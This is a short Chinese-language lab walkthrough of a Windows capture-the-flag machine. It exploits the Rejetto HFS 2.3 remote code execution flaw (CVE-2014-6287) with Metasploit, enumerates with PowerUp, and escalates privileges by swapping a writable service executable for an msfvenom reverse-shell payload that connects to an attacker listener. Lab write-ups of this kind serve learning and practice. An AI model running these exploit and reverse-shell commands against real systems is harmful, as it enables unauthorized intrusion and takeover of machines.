使用 metasploit 进行初始访问,使用 powershell 进行 Windows 特权升级枚举,并学习一种新技术来获得管理员访问权限。
Nmap
8080端口开的这个服务
Rejetto HTTP File Server 2.3 找到个rce—CVE-2014–6287
可以用msf直接利用
rce利用
1 2 3 4
| use exploit/windows/http/rejetto_hfs_exec set RHOSTS 10.10.240.57 set RPORT 8080 run
|
提权
传个之前的PowerUp 的 powershell 脚本,其目的是评估 Windows 机器并确定任何异常情况 - “ PowerUp 旨在成为 _依赖于错误配置的常见 Windows 权限提升向量的交换所。
用metasploit的upload命令来上传脚本
1 2
| upload /root/tools/tiquan/windows/PowerUp.ps1 -> c://users//bill//desktop\PowerUp.ps1
|
上传到目标桌面后
1 2 3 4
| load powershell pwershell_shell 进入powershell . .\Powerup.ps1 Invoke-Allchecks
|
1 2 3
| 记录路径 CanRestart : True 表示可以重启应用程序的目录也是可写的 C:\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe
|
1
| msfvenom -p windows/shell_reverse_tcp LHOST=<攻击者ip> LPORT=<攻击者端口> -e x86/shikata_ga_nai -f exe -o ASCService.exe
|
另起一个msf监听
1 2 3 4
| use exploit/multi/handler set lhost 10.13.40.87 set lport 和上面生成的端口一样 exploit
|
1 2 3 4 5 6 7 8
| 回到先前的shell里 shell sc stop AdvancedSystemCareService9 关闭这个可以重启的服务
copy ASCService.exe "\Program Files (x86)\IObit\Advanced SystemCare\ASCService.exe" 把生成的马替换掉
sc start AdvancedSystemCareService9 启动这个服务
|